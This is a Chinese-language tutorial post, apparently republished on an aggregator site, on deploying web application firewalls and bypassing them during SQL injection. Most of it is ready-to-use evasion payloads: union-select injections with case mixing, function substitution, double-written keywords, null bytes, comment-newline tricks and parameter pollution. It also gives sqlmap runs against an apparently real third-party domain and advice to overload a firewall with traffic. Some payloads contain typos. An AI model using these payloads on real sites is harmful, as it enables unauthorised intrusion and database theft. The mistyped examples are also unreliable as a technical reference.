目录

一、WAF部署：

1.1、阿里云盾

1.2、安全狗：

1.3、宝塔面板：

下载地址：

桌面应用端

web网页端

二、WAF绕过

2.1、原理：

2.2、介绍：

2.3、WAF分为非嵌入型WAF和嵌入型WAF

三、WAF的判断

 方法一：手动测试

方法二：sqlmap进行测试

四、超过WAF配额绕过：

4.1、原理：

方法一：增加参数个数

方法二：增加参数长度

方法三：增加WAF负载

五、构造异常数据包

5.1、双参数绕过：

5.2、请求方式转换：

5.3、绕过匹配规则：

大小写变换：

常用字符替换：

过滤关键字

使用嵌套：

双重编码：

特殊符号：

http 参数污染

---

常见的有阿里云盾、安全狗、宝塔面板

购买云服务器 ECS 即可免费使用云盾的基础功能，为中小网站提供如安全漏洞检测、网页木马检测以及面向云服务器用户提供的主机入侵检测、防DDOS等一站式安全服务

下载地址：

安装教程（可能出现的错误）：

一体化防御：包括网络层、网站应用层、系统层防御。

网站安全狗、服务器安全狗、安全狗服云

下载地址：

桌面应用端

传统的软件端操作界面，可以对服务器的站点进行高效的管理

高效的操作管理，可快速搭建站点、数据库、FTP等服务

web网页端

相对于桌面应用端有更好的体验，跨终端、跨平台

高效的操作管理，可快速搭建站点、数据库、FTP等服务

完善的在线文件管理器，轻松实现图片查看，文本编辑，文件打包解压

---

---

WAF(Web Application Firewall) 可以屏蔽常见的网站漏洞攻击，如SQL注入，XML注入、XSS等。WAF针对的是应用层而非网络层的入侵。其难点是对入侵的检测能力，尤其是对Web服务入侵的检测，WAF最大的挑战是识别率。对于已知的攻击方式，可以谈识别率，但是对于未知的攻击手段，WAF是检测不到的

大多数的WAF都是基于规则的WAF，对接数据收到的包进行正则匹配过滤，如果正则匹配到与现有漏洞知识库的攻击代码相同，则认为这个恶意代码并进行阻断。对于基于规则匹配的WAF，每天都需要及时更新最新的漏洞库。

只有在 WAF解析HTTP请求 或 WAF匹配规则 两个地方进行绕过。

第三、四步是WAF匹配到攻击之后的操作，这时候WAF已经检测到攻击了

1. 解析http请求：协议解析模块
2. 匹配规则：规则检测模块，匹配规则库
3. 防御动作：return 403 或者跳转到自定义界面，或者不返回任何数据，或者拉黑IP
4. 日志记录：记录到elk中

在实际的渗透测试过程中，经常会碰到网站存在WAF的情况。网站存在WAF，意味着我们不能使用安全工具对网站进行测试，因为一旦触碰了WAF的规则，轻则丢弃报文，重则拉黑IP。所以，我们需要手动进行WAF的绕过，而绕过WAF前肯定需要对WAF 的工作原理有一定的理解

非嵌入型WAF指的是硬件型WAF、云WAF、软件型WAF之类的；而嵌入型WAF指的是网站内置的WAF。非嵌入型WAF对Web流量的解析完全是靠自身的，而嵌入型WAF拿到的Web数据是已经被解析加工好的。所以非嵌入型的受攻击机面还涉及到其他层面，而嵌入型WAF从Web容器模块型WAF、代码层WAF往下走，其对抗畸形报文、扫操作绕过的能力越来越强。当然，在部署维护成本方面，也是越高的。

---

---

 方法一：手动测试

①最简单的SQL语句

and 1=1

and 1=2

②在域名后加上一个不存在的id参数，并且加上明显sql注入语句，查看服务器回显

---

方法二：sqlmap进行测试

sqlmap -u 'http://www.xxxxx.com/index.html' --batch --random-agent   

random-agent 是通过/usr/share/sqlmap/txt/user-agents.txt字典随机生成一个user-agent

对于这个网站我没检测出来是什么离大谱了 

sqlmap -u 'http://www.shmds.com/index.html' --batch --random-agent --forms --crawl=2  

 还是没测出来，但是被拉黑了，说明是有waf

---

---

为不干扰到网站的正常运行，配置WAF检测额度内进行过滤，有些WAF就会设置如果数据包长度超过所检测的长度，就会对部分数据包或者是数据包的部分内容进行无检测“放行”。

方法一：增加参数个数

配置的原因，例如safedog，只会检测前100个参数，把自己的执行语句放在100个之后

方法二：增加参数长度

文件上传漏洞利用时，增加无意义数据，webshell放在最后面；SQL注入时，增加URL编码长度，并注释掉；xss测试时加入无意义内容

方法三：增加WAF负载

向WAF发送大量正常数据包，并发送异常数据包，导致站点流量过大，可能会对部分数据包进行检查，注意分寸，避免造成宕机。

---

---

网站有1个id参数，在数据包中包含2个id参数进去，waf可能只检查第一个，第二个就被服务器执行了。

根据对WAF配置的不同

如果WAF只检验GET类型的包，忽略POST类型的包，修改数据包类型尝试绕过

如果WAF只检验POST类型的包，忽略GET类型的包，修改数据包类型尝试绕过

有时，也可尝试，把数据包改为request类型等或根本就不存在的其他类型

---

大小写变换：

?id=-1' UnIOn SeLEct  1,VERsion(),3   

---

常用字符替换：

greatest 替换 > 

greatest返回两个值中大的那个

?id=-1' union select greatest(ascii(substr(database(),0,1)),1) --+

substr(string,b,c)-------->截取字符串string，从第b个开始，截取c个

least  替换 <

least返回两个值中小的那个

?id=-1' union select least(ascii(substr(database(),0,1)),1000000) --+

strcmp函数

比较两个值大小，相等返回0 后者比前者大返回-1 小返回1

?id=-1' union select srtcmp(ascii(substr(database(),0,1)),100) --+

 

in 替换 =

相等返回1 不相等返回 0

?id=-1' union select substr(database()) in ("u") --+

between and 替换 =

?id=-1' union select substr(database()) between "a" and "u" --+

form for

盲注过滤逗号

?id=-1' union select(database() form 0 for 1) --+

limit A offset B

当过滤逗号时,limit 后面只能有一个参数，表示要取的数量，offset 表示跳过数量

select * from users limit 3 offset 2

表示跳过前2个，取3个，即3，4，5

benchmark替换sleep

benchmark来测速，即执行select database() 5000次所需时间

benchmark(5000,(select database()))

hex() bin() 替换 ascii()

hex(substr(database(),0,1))=55

concat_ws替换group_concat

concat_ws(",",database(),version())

---

过滤关键字

即过滤如select、or、from等的关键字。有些在过滤时没有进行递归过滤，而且刚好将关键字替换为空。这时候，我们可以使用穿插关键字的方法进行绕过操作

---

使用嵌套：

对某些关键字替换为空，尝试采用嵌套双写进行绕过

SELselectECT、UNunionION

---

双重编码：

WAF会解码后过滤

---

特殊符号：

+(-)(@)(!)等替代空格

select+database()

select@database()

xor逻辑异或

任意一个数为NULL时,返回NULL

非NULL的数,逻辑真假值相异，返回1，否则为0

database()="admin" xor 0

  ()  %0a  ``  2个空格 替代 空格

selectdatabase()

替换and or not xor

and ----> &&    ,or ------> ||  ,xor ------> |     ,not ----->  !

替换=

like   rlike

where id rlike 1

where id like "admin"

union all select

select password from users where id rlike 1 union all select version();

版本结合

版本小于50014

select 

注释符加换行绕过

 select #a database() 

selelct %23%0a database()

(%23表示注释   %0a表示换行)

空字节 

有的过滤会碰到空字节会中止过滤

?id=1 a%00nd 1=2……

?id=1 %00 and 1=2…… 

---

http 参数污染

利用参数污染来导致网站和安全狗接受数据的不一致性，实现绕过的操作。当get方式进行传参时，经过&符号传入多个参数，WAF可能只检测第一个参数的值，然后台却检测最后一个传入的值，此时能够绕过WAF的防护

下图即每种服务器获得到的参数

?id=1 

安全狗收到的：  1        

被注释，没法执行，安全狗会忽略

网站收到的：  -1' union select 1,database(),3 #*/      

    以上就是本篇文章【（18）【WAF绕过】WAF部署、绕过分析和原理、注入绕过WAF方法】的全部内容了，欢迎阅览 ！ 文章地址：http://fabua.ksxb.net/news/4650.html 
     文章      相关文章      动态      同类文章      热门文章      栏目首页      网站地图      返回首页 海之东岸资讯移动站 http://fabua.ksxb.net/mobile/ , 查看更多